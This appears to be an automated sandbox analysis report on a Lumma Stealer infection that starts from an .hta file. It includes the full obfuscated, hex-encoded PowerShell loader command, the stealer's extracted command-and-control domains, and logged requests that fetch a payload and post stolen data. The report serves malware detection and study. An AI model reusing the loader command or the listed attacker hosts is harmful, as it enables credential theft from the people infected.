htXbx('0F7A7222E17CFB1BB92172CFD10B1A0A35F2D236DE6DD8D72D66B13FEDB4D7CF6A19FA5E844D4EA4BDA294B8324F3D40BBE3A32FA2F602F7EEC40E64690703556F440E32E54DB889F70490BFAB024711BA156E7EF3961FB117120CBA4913EA1E5D84ACF6F55EBA7C85C4EDEAE94CA6F88E91D98428FF8C02DEA04EB6BC87CD7054DA2412B8E711F8C1A790EDD10E33300549B54953E993973674C4C6B322DF9A94608D0E38BF1B68335F96BFDC063A0ACAC3F5674C4FB62FD421AFD6B98437F6E9805448603B36D23A3100350C5424A024DEBEE06EFCCB25BC5C2ED9E55F0ECDF8D82A5F5B3DDE3DD01D9414613DC77C41FF3714787CA86BAB941A84FA1697BFD67AE1442E846F4C0BCD12067B97F4C4761C790D99134685BD29D33EB13930E881348CCEB581A392F1C4D3A954998DE262A182E3BA192BC030972631DFF7761B192A8E761FB393F15CEC5503F481993757B7386A6DEFCB30893CB5510F8D9DFCD357A4503657121993C1DA20619FC16A76829A33DC8BEC2C25B345E40D743AE3FA6908A2256106EDB3D401A541BBC6B63D25361ED338A28142AEDFD2E2AFA4224709FD2AB99578CAD2D426AC01B625107469B2CFC6F80544CD0418A85DF7B0034592F05C391690F1CB1F0E38C8C36984958B671982168DA7FCD4BA7B76DA7D1F52FBD0449C19027B914FDE6DE5FAAA8CB6BF3F2A4274A8F5CCEED4E85FE2BAE43E079DB816A326CFEC5CF89E8BDA8C7656D7ABB681564558044E3E53669EE9994092F98411AB22F4889A3454BB3DA6791DB0F9C47830F4C06A5461824C4CD5AF8028E685AAA4298897434D4728EDCF0C7F21C0C4A773C3B93B8D500AD8247E5F882A6D58627B2848A409F59326CE2F3C94419453CBD81D72A42EFC7700BF0F755EBF04E26ADC65680A8AB81DC31B386413F68BDCDF1C0851EABFB0BBAE9CCC1EEC68F50A6C1E0D56474F854AE2306A1E2A3F8B94A0127DD3E51C4A536048EF14CDBF4B53A4E0C3EEFEFA4EED2CFE4541E54F2D69773940D13F9015002C0555FDC45820883EE8D40D25214D7139E6E12032C2BFE100C55FA40524F297C439B1A01353D2284C6CEF35AC57E4400EDA829B3E642624CDFA0BC2973809DC3345E9E56C2D1156147CEA34B91CFFF59896E54208B4CFD4207A17F7308C33D76C6413AB80C8D92695DDC466BC03F75D4179A7F1740B7A3E5A6C6D80F2FB8D74FFB55BD62E27D14A6503857D18986D8E19A1D8E35AD79FEE150ABE148D1B1C3E2D9D92C0B0BDF7DE18DFF55FD02B3212CC62401C8900CAECAAADE5361BFC807F5384EEA46BABDA1F2032769CDA2B56A725574AD832150B7026D06D0547D37743BD92A3253A6BE7C4BE7457307E6CDE57B7840C35ECC06809A8FA8BF2351601EA6C1E3A025BA6CD107626BBF16CFED99355A4AC130AD2BEF7D8E3B1D936DC4D667BAE44082E02E0251C2355712885575901AEFDC0139AA662D0B9C4ACBF7403673B3C7DDF9E6E3AB15A286FC41C2D998ED91EDD22436BA61DD3F3D745E36681712D110962FBD642A2CB901801E7AF328696116A425AC0D6F7C474A297EBC5F89A3C52EE8DB03DE0214B816208AD47E4A4EB4864F152130AEA847AD1031A9DDED4248D031BCE58B447EB0CC8763D2CDBF3348D053D54B42C707D6DE3B3166FBF46CFB8F8AB676945A5D0B7FF4DD2DAF54B40F69592D58649EFE2B1F4CDADC627160733882C0C916DE660976CBCD588F71A3D08308A76F8B82ED698B928D9B2C66911F8A2975942AC360069AC4B4D6C8C7E50E99B0CBD066A58477B4F336F9B12A5FE792E23ED42C6032B887E634ABCA3D08214B16E5953BBD4FFBD057E229E4B7A149D754E75229CD7B38CB289B484AE636864DAFC411FEA976653DC57F0E7B6EA81960AC0059DB8FD2E23F7D92ABD90CDC902BB6F71F0094EF783BB18777A34E0B7531A8C1A945811E9CB1DB684D87CE6D7755E48B400E6042DC835F88592C2BEEB4E79F
              Source: Process startedAuthor: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function htXbx($EYwy){return -split ($EYwy -replace '..', '0x$& ')};$sMkL = htXbx('0F7A7222E17CFB1BB92172CFD10B1A0A35F2D236DE6DD8D72D66B13FEDB4D7CF6A19FA5E844D4EA4BDA294B8324F3D40BBE3A32FA2F602F7EEC40E64690703556F440E32E54DB889F70490BFAB024711BA156E7EF3961FB117120CBA4913EA1E5D84ACF6F55EBA7C85C4EDEAE94CA6F88E91D98428FF8C02DEA04EB6BC87CD7054DA2412B8E711F8C1A790EDD10E33300549B54953E993973674C4C6B322DF9A94608D0E38BF1B68335F96BFDC063A0ACAC3F5674C4FB62FD421AFD6B98437F6E9805448603B36D23A3100350C5424A024DEBEE06EFCCB25BC5C2ED9E55F0ECDF8D82A5F5B3DDE3DD01D9414613DC77C41FF3714787CA86BAB941A84FA1697BFD67AE1442E846F4C0BCD12067B97F4C4761C790D99134685BD29D33EB13930E881348CCEB581A392F1C4D3A954998DE262A182E3BA192BC030972631DFF7761B192A8E761FB393F15CEC5503F481993757B7386A6DEFCB30893CB5510F8D9DFCD357A4503657121993C1DA20619FC16A76829A33DC8BEC2C25B345E40D743AE3FA6908A2256106EDB3D401A541BBC6B63D25361ED338A28142AEDFD2E2AFA4224709FD2AB99578CAD2D426AC01B625107469B2CFC6F80544CD0418A85DF7B0034592F05C391690F1CB1F0E38C8C36984958B671982168DA7FCD4BA7B76DA7D1F52FBD0449C19027B914FDE6DE5FAAA8CB6BF3F2A4274A8F5CCEED4E85FE2BAE43E079DB816A326CFEC5CF89E8BDA8C7656D7ABB681564558044E3E53669EE9994092F98411AB22F4889A3454BB3DA6791DB0F9C47830F4C06A5461824C4CD5AF8028E685AAA4298897434D4728EDCF0C7F21C0C4A773C3B93B8D500AD8247E5F882A6D58627B2848A409F59326CE2F3C94419453CBD81D72A42EFC7700BF0F755EBF04E26ADC65680A8AB81DC31B386413F68BDCDF1C0851EABFB0BBAE9CCC1EEC68F50A6C1E0D56474F854AE2306A1E2A3F8B94A0127DD3E51C4A536048EF14CDBF4B53A4E0C3EEFEFA4EED2CFE4541E54F2D69773940D13F9015002C0555FDC45820883EE8D40D25214D7139E6E12032C2BFE100C55FA40524F297C439B1A01353D2284C6CEF35AC57E4400EDA829B3E642624CDFA0BC2973809DC3345E9E56C2D1156147CEA34B91CFFF59896E54208B4CFD4207A17F7308C33D76C6413AB80C8D92695DDC466BC03F75D4179A7F1740B7A3E5A6C6D80F2FB8D74FFB55BD62E27D14A6503857D18986D8E19A1D8E35AD79FEE150ABE148D1B1C3E2D9D92C0B0BDF7DE18DFF55FD02B3212CC62401C8900CAECAAADE5361BFC807F5384EEA46BABDA1F2032769CDA2B56A725574AD832150B7026D06D0547D37743BD92A3253A6BE7C4BE7457307E6CDE57B7840C35ECC06809A8FA8BF2351601EA6C1E3A025BA6CD107626BBF16CFED99355A4AC130AD2BEF7D8E3B1D936DC4D667BAE44082E02E0251C2355712885575901AEFDC0139AA662D0B9C4ACBF7403673B3C7DDF9E6E3AB15A286FC41C2D998ED91EDD22436BA61DD3F3D745E36681712D110962FBD642A2CB901801E7AF328696116A425AC0D6F7C474A297EBC5F89A3C52EE8DB03DE0214B816208AD47E4A4EB4864F152130AEA847AD1031A9DDED4248D031BCE58B447EB0CC8763D2CDBF3348D053D54B42C707D6DE3B3166FBF46CFB8F8AB676945A5D0B7FF4DD2DAF54B40F69592D58649EFE2B1F4CDADC627160733882C0C916DE660976CBCD588F71A3D08308A76F8B82ED698B928D9B2C66911F8A2975942AC360069AC4B4D6C8C7E50E99B0CBD066A58477B4F336F9B12A5FE792E23ED42C6032B887E634ABCA3D08214B16E5953BBD4FFBD057E229E4B7A149D754E75229CD7B38CB289B484AE636864DAFC411FEA976653DC57F0E7B6EA81960AC0059DB8FD2E23F7D92ABD90CDC902BB6F71F0094EF783BB18777A34E0B7531A8C1A945811E9CB1DB684D87CE6D7755E48B400E6042DC835F88592C2BEEB4E79F
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-12-22T13:44:20.650107+010020283713Unknown Traffic192.168.2.650007104.21.48.1443TCP
              2024-12-22T13:44:22.788622+010020283713Unknown Traffic192.168.2.650008104.21.48.1443TCP
              2024-12-22T13:44:25.100378+010020283713Unknown Traffic192.168.2.650009104.21.48.1443TCP
              2024-12-22T13:44:27.404929+010020283713Unknown Traffic192.168.2.650010104.21.48.1443TCP
              2024-12-22T13:44:29.685593+010020283713Unknown Traffic192.168.2.650011104.21.48.1443TCP
              2024-12-22T13:44:32.200268+010020283713Unknown Traffic192.168.2.650012104.21.48.1443TCP
              2024-12-22T13:44:34.269635+010020283713Unknown Traffic192.168.2.650014104.21.48.1443TCP
              2024-12-22T13:44:36.342390+010020283713Unknown Traffic192.168.2.650015104.21.48.1443TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-12-22T13:44:21.556888+010020546531A Network Trojan was detected192.168.2.650007104.21.48.1443TCP
              2024-12-22T13:44:23.596894+010020546531A Network Trojan was detected192.168.2.650008104.21.48.1443TCP
              2024-12-22T13:44:37.097108+010020546531A Network Trojan was detected192.168.2.650015104.21.48.1443TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-12-22T13:44:21.556888+010020498361A Network Trojan was detected192.168.2.650007104.21.48.1443TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-12-22T13:44:23.596894+010020498121A Network Trojan was detected192.168.2.650008104.21.48.1443TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-12-22T13:44:35.070934+010020480941Malware Command and Control Activity Detected192.168.2.650014104.21.48.1443TCP

              Click to jump to signature section

              Show All Signature Results

              AV Detection

              barindex
              Source: 22.2.powershell.exe.400000.0.unpackMalware Configuration Extractor: LummaC {"C2 url": ["necklacebudi.lat", "grannyejh.lat", "energyaffai.lat", "sustainskelet.lat", "learningypr.click", "rapeflowwj.lat", "discokeyus.lat", "crosshuaht.lat", "aspecteirs.lat"], "Build id": "jMw1IE--bigJ"}
              Source: winwidgetshp.mp4.htaVirustotal: Detection: 14%Perma Link
              Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.8% probability
              Source: 22.2.powershell.exe.400000.0.unpackString decryptor: rapeflowwj.lat
              Source: 22.2.powershell.exe.400000.0.unpackString decryptor: crosshuaht.lat
              Source: 22.2.powershell.exe.400000.0.unpackString decryptor: sustainskelet.lat
              Source: 22.2.powershell.exe.400000.0.unpackString decryptor: aspecteirs.lat
              Source: 22.2.powershell.exe.400000.0.unpackString decryptor: energyaffai.lat
              Source: 22.2.powershell.exe.400000.0.unpackString decryptor: necklacebudi.lat
              Source: 22.2.powershell.exe.400000.0.unpackString decryptor: discokeyus.lat
              Source: 22.2.powershell.exe.400000.0.unpackString decryptor: grannyejh.lat
              Source: 22.2.powershell.exe.400000.0.unpackString decryptor: learningypr.click
              Source: 22.2.powershell.exe.400000.0.unpackString decryptor: lid=%s&j=%s&ver=4.0
              Source: 22.2.powershell.exe.400000.0.unpackString decryptor: TeslaBrowser/5.5
              Source: 22.2.powershell.exe.400000.0.unpackString decryptor: - Screen Resoluton:
              Source: 22.2.powershell.exe.400000.0.unpackString decryptor: - Physical Installed Memory:
              Source: 22.2.powershell.exe.400000.0.unpackString decryptor: Workgroup: -
              Source: 22.2.powershell.exe.400000.0.unpackString decryptor: jMw1IE--bigJ
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 22_2_00419F2F CryptUnprotectData,22_2_00419F2F
              Source: unknownHTTPS traffic detected: 104.21.18.182:443 -> 192.168.2.6:49720 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.48.1:443 -> 192.168.2.6:50007 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.48.1:443 -> 192.168.2.6:50008 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.48.1:443 -> 192.168.2.6:50009 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.48.1:443 -> 192.168.2.6:50010 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.48.1:443 -> 192.168.2.6:50011 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.48.1:443 -> 192.168.2.6:50012 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.48.1:443 -> 192.168.2.6:50014 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.48.1:443 -> 192.168.2.6:50015 version: TLS 1.2
              Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e source: powershell.exe, 00000006.00000002.3467126225.00000000030A0000.00000004.08000000.00040000.00000000.sdmp
              Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb source: powershell.exe, 00000006.00000002.3467126225.00000000030A0000.00000004.08000000.00040000.00000000.sdmp
              Source: Binary string: protobuf-net.pdbSHA256}Lq source: powershell.exe, 00000006.00000002.3510342893.00000000074D0000.00000004.08000000.00040000.00000000.sdmp
              Source: Binary string: protobuf-net.pdb source: powershell.exe, 00000006.00000002.3510342893.00000000074D0000.00000004.08000000.00040000.00000000.sdmp
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then jmp 074BC416h6_2_074BC0E8
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then jmp 074B697Dh6_2_074B6758
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then jmp 074B697Dh6_2_074B6768
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then jmp 074B61A5h6_2_074B5E00
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then jmp 074B61A5h6_2_074B5DF0
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then jmp 074BC416h6_2_074BC1DE
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then jmp 074BC416h6_2_074BC0DB
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then jmp eax22_2_00424010
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then movzx edi, byte ptr [esp+eax+04h]22_2_00424010
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then mov word ptr [edx], cx22_2_004189C3
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then movzx edi, byte ptr [eax]22_2_0040AC10
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then cmp dword ptr [edi+edx*8], 36D9DBB9h22_2_0043E870
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then jmp ecx22_2_0043A8A0
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then movzx eax, byte ptr [esp+edi+1E1E4EFFh]22_2_004090B0
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then mov byte ptr [edx], cl22_2_004090B0
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then mov byte ptr [eax], cl22_2_004170B8
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], 29FCC5D8h22_2_004170B8
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then cmp dword ptr [edi+esi*8], E785F9BAh22_2_004170B8
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then cmp dword ptr [edi+esi*8], 3FE33C50h22_2_004170B8
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then mov byte ptr [esi], cl22_2_0042D16A
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then mov dword ptr [esp], ecx22_2_0042991E
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then mov dword ptr [esp], ecx22_2_004291CB
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then movzx ebx, byte ptr [esp+ecx+53E0EF23h]22_2_0042D1D8
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then mov byte ptr [esi], cl22_2_0042D1D8
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then mov ebx, dword ptr [edi+04h]22_2_0042B980
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then cmp dword ptr [edi+esi*8], E785F9BAh22_2_00414A00
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then mov eax, dword ptr [edi+0Ch]22_2_004022C0
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then push eax22_2_0043BB50
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then movzx esi, byte ptr [esp+eax-000000A6h]22_2_0041635B
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then movzx edx, byte ptr [esp+ecx+00000098h]22_2_0042EB0D
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then movzx edx, byte ptr [esp+ecx+00000098h]22_2_0042EB16
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then jmp dword ptr [0044524Ch]22_2_00426339
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then mov edi, eax22_2_00402BD0
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then add eax, dword ptr [esp+ecx*4+24h]22_2_004073F0
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then movzx ecx, word ptr [edi+esi*4]22_2_004073F0
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then mov ecx, edx22_2_0041DB89
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then cmp word ptr [esi+edx], 0000h22_2_0041DB89
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then mov edx, eax22_2_0043ACD0
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then cmp dword ptr [edi+esi*8], E785F9BAh22_2_00416CE0
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then cmp dword ptr [edi+edx*8], E1CE25DBh22_2_0043E4E0
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then mov edx, ecx22_2_004094B0
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then mov edi, ebx22_2_0042E543
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then movzx eax, byte ptr [esp+edx-3Ah]22_2_0042DD6F
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then mov byte ptr [esi], al22_2_0042CD79
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then movzx edi, byte ptr [ebp+eax-36C2D23Bh]22_2_00427510
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then movzx eax, byte ptr [esp+edx+00000098h]22_2_0042DD10
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then mov eax, dword ptr [004471C4h]22_2_0043BD10
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then mov word ptr [ebx], ax22_2_0041953B
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then add esi, edi22_2_0042D4CA
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then mov edi, dword ptr [eax]22_2_004385A0
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then push eax22_2_004385A0
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then movzx eax, byte ptr [esp+edx]22_2_004385A0
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then mov byte ptr [esi], al22_2_0042CDAB
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then movzx ebx, byte ptr [edx]22_2_00434E50
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then movzx edx, byte ptr [esp+eax+3Ch]22_2_0041CE7A
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then mov byte ptr [esi], al22_2_0042CE0F
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then movzx ecx, word ptr [ebp+edx+02h]22_2_00438E17
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then mov byte ptr [eax], cl22_2_00415ED1
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then cmp word ptr [ebp+esi+00h], 0000h22_2_0041DF70
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then movzx esi, byte ptr [esp+eax-5Ch]22_2_0041DF70
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then jmp dword ptr [00444794h]22_2_00416F05
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then mov word ptr [ebx], cx22_2_0040C70C
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then mov byte ptr [edi], al22_2_0041C7D5
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], E5FE86B7h22_2_0043AF80
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], E5FE86B7h22_2_0043AF80
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then cmp dword ptr [ebp+ebx*8+00h], C72EB52Eh22_2_0043AF80

              Networking

              barindex
              Source: Network trafficSuricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.6:50014 -> 104.21.48.1:443
              Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:50015 -> 104.21.48.1:443
              Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.6:50007 -> 104.21.48.1:443
              Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:50007 -> 104.21.48.1:443
              Source: Network trafficSuricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.6:50008 -> 104.21.48.1:443
              Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:50008 -> 104.21.48.1:443
              Source: Malware configuration extractorURLs: necklacebudi.lat
              Source: Malware configuration extractorURLs: grannyejh.lat
              Source: Malware configuration extractorURLs: energyaffai.lat
              Source: Malware configuration extractorURLs: sustainskelet.lat
              Source: Malware configuration extractorURLs: learningypr.click
              Source: Malware configuration extractorURLs: rapeflowwj.lat
              Source: Malware configuration extractorURLs: discokeyus.lat
              Source: Malware configuration extractorURLs: crosshuaht.lat
              Source: Malware configuration extractorURLs: aspecteirs.lat
              Source: global trafficHTTP traffic detected: GET /hubus.xlsx HTTP/1.1Host: atsuka.thrivezest.orgConnection: Keep-Alive
              Source: Joe Sandbox ViewIP Address: 104.21.48.1 104.21.48.1
              Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
              Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
              Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
              Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:50009 -> 104.21.48.1:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:50008 -> 104.21.48.1:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:50007 -> 104.21.48.1:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:50015 -> 104.21.48.1:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:50011 -> 104.21.48.1:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:50010 -> 104.21.48.1:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:50014 -> 104.21.48.1:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:50012 -> 104.21.48.1:443
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: learningypr.click
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 78Host: learningypr.click
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=HB1VYCV10Q0DSUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 12828Host: learningypr.click
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=6NTLDMUFCLZKFZZ6BUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 15098Host: learningypr.click
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=RX2ZQDW2W0NV1DWJ16User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 19962Host: learningypr.click
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=LZAQH4UM7XDWG9ZNUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1207Host: learningypr.click
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=SQ9O8JPI4MPQCKNB2User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1122Host: learningypr.click
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 113Host: learningypr.click
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: global trafficHTTP traffic detected: GET /hubus.xlsx HTTP/1.1Host: atsuka.thrivezest.orgConnection: Keep-Alive
              Source: global trafficDNS traffic detected: DNS query: atsuka.thrivezest.org
              Source: global trafficDNS traffic detected: DNS query: learningypr.click
